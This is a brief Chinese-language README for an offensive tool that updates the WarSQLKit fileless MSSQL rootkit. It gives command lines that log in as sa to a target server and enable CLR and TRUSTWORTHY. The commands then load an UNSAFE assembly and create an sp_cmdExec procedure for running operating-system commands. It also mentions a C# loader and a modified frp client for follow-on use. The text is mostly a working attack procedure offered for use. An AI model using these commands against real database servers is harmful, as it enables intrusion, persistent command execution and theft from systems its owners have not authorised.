目的主要是摆脱MSSMS和 Navicat 调用执行 sp_cmdExec
在原有项目( https://github.com/EPICROUTERSS/MSSQL-Fileless-Rootkit-WarSQLKit )做了更新
基于狼师傅的工具(http://wolvez.club/2019/09/19/mssql-command-tool/)稍微改了下程序
./mssqlrootkit -s 3.3.3.155 -u sa -p Admin1314 -q "sp_configure 'clr enabled', 1;RECONFIGURE;ALTER DATABASE master SET TRUSTWORTHY ON;"
CREATE ASSEMBLY [WarSQLKit] AUTHORIZATION [dbo] FROM 0x4D5A9... WITH PERMISSION_SET = UNSAFE;
./mssqlrootkit -s 3.3.3.155 -u sa -p Admin1314 -q 'CREATE PROCEDURE [dbo].[sp_cmdExec] @cmd NVARCHAR (MAX), @result NVARCHAR (MAX) OUTPUT AS EXTERNAL NAME [WarSQLKit].[StoredProcedures].[CmdExec];'
瞎改了个 c# loader, 各位师傅将就用
部分利用思路:
例如: uknowsec师傅的-Frpc命令行版 https://github.com/uknowsec/frpModify